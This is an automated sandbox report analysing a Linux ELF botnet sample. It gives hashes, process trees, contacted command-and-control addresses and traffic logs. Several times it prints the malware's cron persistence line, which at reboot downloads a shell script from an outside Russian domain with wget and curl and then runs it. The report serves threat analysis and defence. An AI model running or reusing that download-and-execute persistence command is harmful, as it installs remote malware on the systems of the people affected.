Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nshsh4.elf

Overview

General Information

Sample name:nshsh4.elf
Analysis ID:1542853
MD5:abc6baddfa99634d1fc0b44be7aa4da0
SHA1:dc2bd0805cf42c3cc58cb4ac0eca083ef7790795
SHA256:6842684059ec919a5960bd49053831ea2b1902e6a747b9386895bc1690161238
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542853
Start date and time:2024-10-26 19:11:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 50s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nshsh4.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@23/0
  • VT rate limit hit for: nshsh4.elf
Command:/tmp/nshsh4.elf
PID:6253
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • nshsh4.elf (PID: 6253, Parent: 6176, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/nshsh4.elf
    • sh (PID: 6255, Parent: 6253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6257, Parent: 6255)
        • sh New Fork (PID: 6259, Parent: 6257)
        • crontab (PID: 6259, Parent: 6257, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6258, Parent: 6255)
      • crontab (PID: 6258, Parent: 6255, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nshsh4.elfReversingLabs: Detection: 23%
Source: tmp.L3xqaq.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 195.133.92.51 ports 3,4,5,6,6435,6735
Source: global trafficTCP traffic: 193.233.193.45 ports 1,2,3,4,6,14623
Source: global trafficTCP traffic: 88.151.195.22 ports 7830,2,3,25385,5,8
Source: global trafficTCP traffic: 81.29.149.178 ports 15394,7362,1,3,4,5,9,6999,7869
Source: global trafficTCP traffic: 91.149.238.18 ports 13529,1,2,3,5,9
Source: global trafficTCP traffic: 192.168.2.23:33524 -> 88.151.195.22:25385
Source: global trafficTCP traffic: 192.168.2.23:53156 -> 91.149.218.232:17134
Source: global trafficTCP traffic: 192.168.2.23:40970 -> 195.133.92.51:6435
Source: global trafficTCP traffic: 192.168.2.23:46098 -> 81.29.149.178:15394
Source: global trafficTCP traffic: 192.168.2.23:36488 -> 185.82.200.181:6718
Source: global trafficTCP traffic: 192.168.2.23:49520 -> 91.149.238.18:13529
Source: global trafficTCP traffic: 192.168.2.23:55186 -> 31.13.248.89:22472
Source: global trafficTCP traffic: 192.168.2.23:42280 -> 193.233.193.45:14623
Source: /tmp/nshsh4.elf (PID: 6253)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.L3xqaq.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@23/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6259)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6258)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6258)File: /var/spool/cron/crontabs/tmp.L3xqaqJump to behavior
Source: /usr/bin/crontab (PID: 6258)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nshsh4.elf (PID: 6255)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nshsh4.elf (PID: 6253)Queries kernel information via 'uname': Jump to behavior
Source: nshsh4.elf, 6253.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6260.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6303.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
Source: nshsh4.elf, 6253.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6260.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6303.1.000055aeb8234000.000055aeb82bc000.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
Source: nshsh4.elf, 6253.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6260.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmp, nshsh4.elf, 6303.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmpBinary or memory string: rx86_64/usr/bin/qemu-sh4/tmp/nshsh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshsh4.elf
Source: nshsh4.elf, 6253.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6260.1.000055aeb8234000.000055aeb82bc000.rw-.sdmp, nshsh4.elf, 6303.1.000055aeb8234000.000055aeb82bc000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
Source: nshsh4.elf, 6303.1.00007ffe0d65d000.00007ffe0d67e000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542853 Sample: nshsh4.elf Startdate: 26/10/2024 Architecture: LINUX Score: 60 30 91.149.238.18, 13529, 49520 MARTON-ASPL Poland 2->30 32 193.233.193.45, 14623, 42280 FREE-NET-ASFREEnetEU Russian Federation 2->32 34 10 other IPs or domains 2->34 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 nshsh4.elf 2->9         started        signatures3 process4 process5 11 nshsh4.elf sh 9->11         started        13 nshsh4.elf 9->13         started        15 nshsh4.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        23 nshsh4.elf 13->23         started        file7 28 /var/spool/cron/crontabs/tmp.L3xqaq, ASCII 17->28 dropped 36 Sample tries to persist itself using cron 17->36 38 Executes the "crontab" command typically for achieving persistence 17->38 25 sh crontab 21->25         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 25->44
SourceDetectionScannerLabelLink
nshsh4.elf24%ReversingLabsLinux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
194.87.198.29
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.L3xqaq.18.drfalse
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      185.82.200.181
      unknownNetherlands
      60117HSAEfalse
      195.133.92.51
      unknownRussian Federation
      197695AS-REGRUtrue
      193.233.193.45
      unknownRussian Federation
      2895FREE-NET-ASFREEnetEUtrue
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.149.218.232
      unknownPoland
      198401GECKONET-ASPLfalse
      31.13.248.89
      unknownBulgaria
      34224NETERRA-ASBGfalse
      88.151.195.22
      unknownAzerbaijan
      15723AZERONLINEAZtrue
      81.29.149.178
      unknownSwitzerland
      39616COMUNICA_IT_SERVICESCHtrue
      91.149.238.18
      unknownPoland
      41952MARTON-ASPLtrue
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      185.82.200.181harm4.elfGet hashmaliciousUnknownBrowse
        mips.elfGet hashmaliciousUnknownBrowse
          mpsl.elfGet hashmaliciousUnknownBrowse
            arm4.elfGet hashmaliciousUnknownBrowse
              na.elfGet hashmaliciousUnknownBrowse
                195.133.92.51harm4.elfGet hashmaliciousUnknownBrowse
                  mips.elfGet hashmaliciousUnknownBrowse
                    mips.elfGet hashmaliciousUnknownBrowse
                      193.233.193.45harm4.elfGet hashmaliciousUnknownBrowse
                        mips.elfGet hashmaliciousUnknownBrowse
                          hmips.elfGet hashmaliciousUnknownBrowse
                            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                            91.149.218.232harm4.elfGet hashmaliciousUnknownBrowse
                              ppc.elfGet hashmaliciousUnknownBrowse
                                x86.elfGet hashmaliciousUnknownBrowse
                                  31.13.248.89harm4.elfGet hashmaliciousUnknownBrowse
                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                      mips.elfGet hashmaliciousUnknownBrowse
                                        arm4.elfGet hashmaliciousUnknownBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          kingstonwikkerink.dynharm4.elfGet hashmaliciousUnknownBrowse
                                          • 31.13.248.89
                                          mips.elfGet hashmaliciousUnknownBrowse
                                          • 81.29.149.178
                                          arm.elfGet hashmaliciousUnknownBrowse
                                          • 213.182.204.57
                                          hmips.elfGet hashmaliciousUnknownBrowse
                                          • 194.87.198.29
                                          arm7.elfGet hashmaliciousUnknownBrowse
                                          • 185.82.200.181
                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                          • 81.29.149.178
                                          ppc.elfGet hashmaliciousUnknownBrowse
                                          • 88.151.195.22
                                          mips.elfGet hashmaliciousUnknownBrowse
                                          • 88.151.195.22
                                          arm5.elfGet hashmaliciousUnknownBrowse
                                          • 88.151.195.22
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          INIT7CHmips.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          c0r0n4x.mips.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          c0r0n4x.mpsl.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          a.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          .i.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          .i.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          bin.sh.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          LxyPEKz4ts.elfGet hashmaliciousMiraiBrowse
                                          • 109.202.202.202
                                          arm5.elfGet hashmaliciousUnknownBrowse
                                          • 109.202.202.202
                                          main_x86_64.elfGet hashmaliciousMiraiBrowse
                                          • 109.202.202.202
                                          HSAEharm4.elfGet hashmaliciousUnknownBrowse
                                          • 185.82.200.181
                                          mips.elfGet hashmaliciousUnknownBrowse
                                          • 185.82.200.181
                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                          • 185.82.200.181
                                          arm4.elfGet hashmaliciousUnknownBrowse
                                          • 185.82.200.181
                                          Copia r#U00e1pida del pago INV 00932024.exeGet hashmaliciousAgentTeslaBrowse
                                          • 194.36.191.196
                                          SecuriteInfo.com.Heur.27949.8326.docxGet hashmaliciousUnknownBrowse
                                          • 185.82.202.150
                                          Proforma Invoice NOCAP PLASTIK AMBALA.exeGet hashmaliciousAgentTeslaBrowse
                                          • 194.36.191.196
                                          ynwj.ps1Get hashmaliciousUnknownBrowse
                                          • 194.36.191.196
                                          na.elfGet hashmaliciousUnknownBrowse
                                          • 185.82.200.181
                                          RFQ SN00954666 for prosjekt CMC 40 fot container.exeGet hashmaliciousAgentTeslaBrowse
                                          • 194.36.191.196
                                          FREE-NET-ASFREEnetEUharm4.elfGet hashmaliciousUnknownBrowse
                                          • 193.233.193.45
                                          mips.elfGet hashmaliciousUnknownBrowse
                                          • 193.233.193.45
                                          Rechnung_643839483.pdf.lnkGet hashmaliciousUnknownBrowse
                                          • 147.45.44.131
                                          hmips.elfGet hashmaliciousUnknownBrowse
                                          • 193.233.193.45
                                          5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeGet hashmaliciousStealc, VidarBrowse
                                          • 147.45.44.221
                                          http://heks.egrowbrands.com/yuop/66e9b62daa62d_xin.exeGet hashmaliciousUnknownBrowse
                                          • 147.45.44.104
                                          http://hans.uniformeslaamistad.com/malesa/6705347f535f8_install.exeGet hashmaliciousUnknownBrowse
                                          • 147.45.44.104
                                          http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exeGet hashmaliciousUnknownBrowse
                                          • 147.45.44.104
                                          http://lide.omernisar.com/lopsa/66daf6d8ac980_PeakSports.exeGet hashmaliciousUnknownBrowse
                                          • 147.45.44.104
                                          01oTkKQVSW.exeGet hashmaliciousUnknownBrowse
                                          • 147.45.47.185
                                          AS-REGRUharm4.elfGet hashmaliciousUnknownBrowse
                                          • 195.133.92.51
                                          mips.elfGet hashmaliciousUnknownBrowse
                                          • 195.133.92.51
                                          PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                          • 194.58.112.174
                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                          • 212.24.61.227
                                          New orde.exeGet hashmaliciousFormBookBrowse
                                          • 194.58.112.174
                                          FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                          • 194.58.112.174
                                          P1 BOL.exeGet hashmaliciousUnknownBrowse
                                          • 37.140.192.179
                                          mips.elfGet hashmaliciousUnknownBrowse
                                          • 195.133.92.51
                                          z10982283782.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • 194.58.112.174
                                          Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 194.58.112.174
                                          No context
                                          No context
                                          Process:/usr/bin/crontab
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):306
                                          Entropy (8bit):5.161770058934372
                                          Encrypted:false
                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQcBuZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJD:8QjHig8cMeHLUHYC+GABjnOGAFkz
                                          MD5:8C0471FB9E67E22555ADE017B3AECF27
                                          SHA1:FA5C4EE40A33E6657865BCE8AD3EE5E41ABCC849
                                          SHA-256:3A030EFF4E1D53BA3240E676FF46D57BC52A36802368E6FFE8AC0F0FB37B08FF
                                          SHA-512:F2AE247920516A9DA91E0D7E84055B22F17C3C7B307D6EA42070BEA4C6351082ACC3327E4BDD1F1BEEB749B99BB2E8D68AEFBFAD97F64CA62DD510523209AD97
                                          Malicious:true
                                          Reputation:low
                                          Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:11:59 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                          File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                                          Entropy (8bit):6.88900670458556
                                          TrID:
                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                          File name:nshsh4.elf
                                          File size:67'944 bytes
                                          MD5:abc6baddfa99634d1fc0b44be7aa4da0
                                          SHA1:dc2bd0805cf42c3cc58cb4ac0eca083ef7790795
                                          SHA256:6842684059ec919a5960bd49053831ea2b1902e6a747b9386895bc1690161238
                                          SHA512:0a11e845df4af4c21bdb49d6dbb65ab19c494b97a1b88883a7358aa02dcafc474b2c21dacde8321d9f1f8ac1097abf1431b1ee7432f60babc2cb2373e0939e8a
                                          SSDEEP:1536:rbuZ57jYrl72lUK7khRQ8N0CR80jmar8u:rbuD7j6Ab7r8N0rkmo8u
                                          TLSH:C5639D23DD3AAE98C1694AB0B4B18E756723E540D2470EBB1AA9C6759043FDCF1097FC
                                          File Content Preview:.ELF..............*.......@.4...........4. ...(...............@...@...........................B...B......T..........Q.td............................././"O.n........#.*@........#.*@L....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

                                          ELF header

                                          Class:ELF32
                                          Data:2's complement, little endian
                                          Version:1 (current)
                                          Machine:<unknown>
                                          Version Number:0x1
                                          Type:EXEC (Executable file)
                                          OS/ABI:UNIX - System V
                                          ABI Version:0
                                          Entry Point Address:0x4001a0
                                          Flags:0x9
                                          ELF Header Size:52
                                          Program Header Offset:52
                                          Program Header Size:32
                                          Number of Program Headers:3
                                          Section Header Offset:67504
                                          Section Header Size:40
                                          Number of Section Headers:11
                                          Header String Table Index:10
                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                          NULL0x00x00x00x00x0000
                                          .initPROGBITS0x4000940x940x300x00x6AX004
                                          .textPROGBITS0x4000e00xe00xe9600x00x6AX0032
                                          .finiPROGBITS0x40ea400xea400x240x00x6AX004
                                          .rodataPROGBITS0x40ea640xea640x19640x00x2A004
                                          .ctorsPROGBITS0x4203cc0x103cc0x80x00x3WA004
                                          .dtorsPROGBITS0x4203d40x103d40x80x00x3WA004
                                          .dataPROGBITS0x4203e00x103e00x37c0x00x3WA004
                                          .gotPROGBITS0x42075c0x1075c0x100x40x3WA004
                                          .bssNOBITS0x42076c0x1076c0x510c0x00x3WA004
                                          .shstrtabSTRTAB0x00x1076c0x430x00x0001
                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                          LOAD0x00x4000000x4000000x103c80x103c86.93730x5R E0x10000.init .text .fini .rodata
                                          LOAD0x103cc0x4203cc0x4203cc0x3a00x54ac2.86980x6RW 0x10000.ctors .dtors .data .got .bss
                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 26, 2024 19:11:59.456883907 CEST43928443192.168.2.2391.189.91.42
                                          Oct 26, 2024 19:12:04.832081079 CEST42836443192.168.2.2391.189.91.43
                                          Oct 26, 2024 19:12:05.856023073 CEST4251680192.168.2.23109.202.202.202
                                          Oct 26, 2024 19:12:15.430845976 CEST3352425385192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:12:15.436398983 CEST253853352488.151.195.22192.168.2.23
                                          Oct 26, 2024 19:12:15.436492920 CEST3352425385192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:12:15.436968088 CEST3352425385192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:12:15.442346096 CEST253853352488.151.195.22192.168.2.23
                                          Oct 26, 2024 19:12:15.442433119 CEST3352425385192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:12:15.447748899 CEST253853352488.151.195.22192.168.2.23
                                          Oct 26, 2024 19:12:16.396672964 CEST253853352488.151.195.22192.168.2.23
                                          Oct 26, 2024 19:12:16.396764040 CEST3352425385192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:12:16.396965981 CEST3352425385192.168.2.2388.151.195.22
                                          Oct 26, 2024 19:12:20.446059942 CEST43928443192.168.2.2391.189.91.42
                                          Oct 26, 2024 19:12:30.684547901 CEST42836443192.168.2.2391.189.91.43
                                          Oct 26, 2024 19:12:31.442256927 CEST5315617134192.168.2.2391.149.218.232
                                          Oct 26, 2024 19:12:31.447680950 CEST171345315691.149.218.232192.168.2.23
                                          Oct 26, 2024 19:12:31.447770119 CEST5315617134192.168.2.2391.149.218.232
                                          Oct 26, 2024 19:12:31.447808027 CEST5315617134192.168.2.2391.149.218.232
                                          Oct 26, 2024 19:12:31.453164101 CEST171345315691.149.218.232192.168.2.23
                                          Oct 26, 2024 19:12:31.453264952 CEST5315617134192.168.2.2391.149.218.232
                                          Oct 26, 2024 19:12:31.458590984 CEST171345315691.149.218.232192.168.2.23
                                          Oct 26, 2024 19:12:32.277232885 CEST171345315691.149.218.232192.168.2.23
                                          Oct 26, 2024 19:12:32.277267933 CEST171345315691.149.218.232192.168.2.23
                                          Oct 26, 2024 19:12:32.277436018 CEST5315617134192.168.2.2391.149.218.232
                                          Oct 26, 2024 19:12:32.277436972 CEST5315617134192.168.2.2391.149.218.232
                                          Oct 26, 2024 19:12:32.277543068 CEST5315617134192.168.2.2391.149.218.232
                                          Oct 26, 2024 19:12:36.827687979 CEST4251680192.168.2.23109.202.202.202
                                          Oct 26, 2024 19:12:37.308525085 CEST409706435192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:37.313894987 CEST643540970195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:37.313970089 CEST409706435192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:37.314023972 CEST409706435192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:37.319289923 CEST643540970195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:37.319341898 CEST409706435192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:37.324625015 CEST643540970195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:38.221709967 CEST643540970195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:38.221930027 CEST409706435192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:38.222028971 CEST409706435192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:43.274890900 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:43.280400038 CEST673557624195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:43.280483007 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:43.280522108 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:43.285939932 CEST673557624195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:43.286010027 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:43.291404009 CEST673557624195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:44.982952118 CEST673557624195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:44.983004093 CEST673557624195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:44.983028889 CEST673557624195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:44.983181000 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:44.983181000 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:44.983181000 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:44.983288050 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:44.984143972 CEST673557624195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:44.984231949 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:44.985555887 CEST673557624195.133.92.51192.168.2.23
                                          Oct 26, 2024 19:12:44.985608101 CEST576246735192.168.2.23195.133.92.51
                                          Oct 26, 2024 19:12:50.020862103 CEST4609815394192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:12:50.026318073 CEST153944609881.29.149.178192.168.2.23
                                          Oct 26, 2024 19:12:50.026408911 CEST4609815394192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:12:50.026434898 CEST4609815394192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:12:50.031902075 CEST153944609881.29.149.178192.168.2.23
                                          Oct 26, 2024 19:12:50.031964064 CEST4609815394192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:12:50.037482977 CEST153944609881.29.149.178192.168.2.23
                                          Oct 26, 2024 19:12:50.916440964 CEST153944609881.29.149.178192.168.2.23
                                          Oct 26, 2024 19:12:50.916641951 CEST4609815394192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:12:50.916738987 CEST4609815394192.168.2.2381.29.149.178
                                          Oct 26, 2024 19:12:55.949117899 CEST364886718192.168.2.23185.82.200.181
                                          Oct 26, 2024 19:12:55.954631090 CEST671836488185.82.200.181192.168.2.23
                                          Oct 26, 2024 19:12:55.954694033 CEST364886718192.168.2.23185.82.200.181
                                          Oct 26, 2024 19:12:55.954718113 CEST364886718192.168.2.23185.82.200.181
                                          Oct 26, 2024 19:12:55.960185051 CEST671836488185.82.200.181192.168.2.23
